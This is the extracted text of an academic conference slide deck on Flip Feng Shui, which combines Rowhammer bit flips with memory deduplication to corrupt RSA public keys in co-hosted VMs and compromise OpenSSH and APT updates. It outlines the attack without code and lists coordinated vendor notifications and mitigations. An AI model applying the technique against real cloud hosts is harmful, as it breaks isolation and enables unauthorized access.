Flip Feng Shui: Hammering a Needle in the Software Stack Ben Gras - - PowerPoint PPT Presentation

Flip Feng Shui: Hammering a Needle in the Software Stack

Kaveh Razavi

Ben Gras

Erik Bosman Bart Preneel1 Cristiano Giuffrida Herbert Bos August 10, 2016

1

Teaser

◮ OpenSSH compromise ◮ apt-get compromise by GPG signature forgery ◮ No software bug ◮ Weak assumptions ◮ Demo!

1

Contribution

Flip Feng Shui is a novel exploitation structure

◮ Hardware glitch ◮ Memory massaging primitive

Makes the glitch

◮ Easy to target precisely ◮ Reliable

We demonstrate FFS = Rowhammer + Memory Deduplication

2

Outline

Flip Feng Shui At Work

3

Outline

Flip Feng Shui At Work Flip Feng Shui Mechanics

4

Outline

Flip Feng Shui At Work Flip Feng Shui Mechanics OpenSSH Attack

5

Outline

Flip Feng Shui At Work Flip Feng Shui Mechanics OpenSSH Attack GPG/APT Updates Attack Demo

6

Outline

Flip Feng Shui At Work Flip Feng Shui Mechanics OpenSSH Attack GPG/APT Updates Attack Demo Notification, Conclusion & Further Resources

7

Section 1 Flip Feng Shui At Work

8

Flip Feng Shui

◮ Flip one bit per page in a co-hosted victim VM ◮ Whenever you know its contents ◮ Organised bitflip ◮ DRAM glitch ◮ Breaks CPU virtualization isolation

9

Section 2 Flip Feng Shui Mechanics

10

Flip Feng Shui Mechanics

◮ Co-hosted VMs ◮ Memory deduplication ◮ Rowhammer ◮ RSA

11

Memory deduplication

12

Memory deduplication

13

Memory deduplication

14

Memory deduplication

15

Memory deduplication

16

Rowhammer

◮ Causes charge to leak in DRAM ◮ DRAM row activations cause flips

17

Rowhammer

◮ Causes charge to leak in DRAM ◮ DRAM row activations cause flips

18

Rowhammer

◮ Causes charge to leak in DRAM ◮ DRAM row activations cause flips

19

Rowhammer

◮ Causes charge to leak in DRAM ◮ DRAM row activations cause flips

20

Rowhammer

◮ Causes charge to leak in DRAM ◮ DRAM row activations cause flips

21

Rowhammer

◮ Causes charge to leak in DRAM ◮ DRAM row activations cause flips

22

Rowhammer

◮ Causes charge to leak in DRAM ◮ DRAM row activations cause flips

23

Rowhammer

◮ Causes charge to leak in DRAM ◮ DRAM row activations cause flips

24

Rowhammer

◮ Causes charge to leak in DRAM ◮ DRAM row activations cause flips

25

Memory deduplication + Rowhammer = FFS

26

Memory deduplication + Rowhammer = FFS

27

Memory deduplication + Rowhammer = FFS

28

Memory deduplication + Rowhammer = FFS

◮ FFS breaks COW

29

RSA

◮ Public key cryptosystem ◮ Two keys: public and private ◮ Compute secret private from factorization

30

FFS - What now?

Break weakened RSA.

0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 10 20 30 40 50 Factorization Success Probability Available Templates 1024-bit Moduli 2048-bit Moduli 4096-bit Moduli

31

Section 3 OpenSSH Attack

32

authorized keys file

Looks like this:

ssh -rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDX y7MdVToVAvKB0 /Xven/kqBzfRZm+GITl6sB0u+Aa 3/ UTC3x+eKjB2jf +48 kTP7AvsdbSwg9Q5upN77xX 3 mNGwwj1RUQpOPPc99XH09M84iCydE +9 smYseySf bJQnrov5Ricz2Z18Neuy5ZUH / Ldrf1NSwWoo5NZL 6 tj0E9JvZurMPPk2EqEyHltEFC6OetJwEfaPq9kO glmzFtBWLHR4dF1796JeVkFiWcmMaykAoN +JRF2n MlayPlUxdWR0JwxZ2cJ9la / QLXvv8x0tsORGP9ZG 5 BWqOcD781evuSS3i91BNg6Osl7mlxo6Mc3oUbew /7 ddV08WjdRBn7iQF9WN beng@mymachine

◮ RSA public key ◮ Attacker writes this to memory ◮ We need the private key

33

OpenSSH FFS attack

34

OpenSSH FFS attack

35

OpenSSH FFS attack

36

OpenSSH FFS attack

37

OpenSSH Attack

0.2 0.4 0.6 0.8 1 2 4 6 8 10 12 CDF Attack time (mins) successful attacks

◮ Could retry

38

Section 4 GPG/APT Updates Attack Demo

39

GPG/APT Updates

◮ With FFS we flip /etc/apt/sources.list ◮ With FFS we flip /etc/apt/trusted.gpg ◮ Use computed private key ◮ Long term RSA Ubuntu signing keys

40

Section 5 Notification, Conclusion & Further Resources

41

Notification

◮ Notified: Red Hat, Oracle, Xen, VMware, Debian,

Ubuntu, OpenSSH, GnuPG, some hosting companies

◮ Thank you NCSC ◮ GnuPG commit

42

Conclusion

◮ Flip Feng Shui breaks isolation ◮ Co-hosting VMs is risky ◮ Disable memory dedup

https://www.vusec.net/projects/flip-feng-shui

43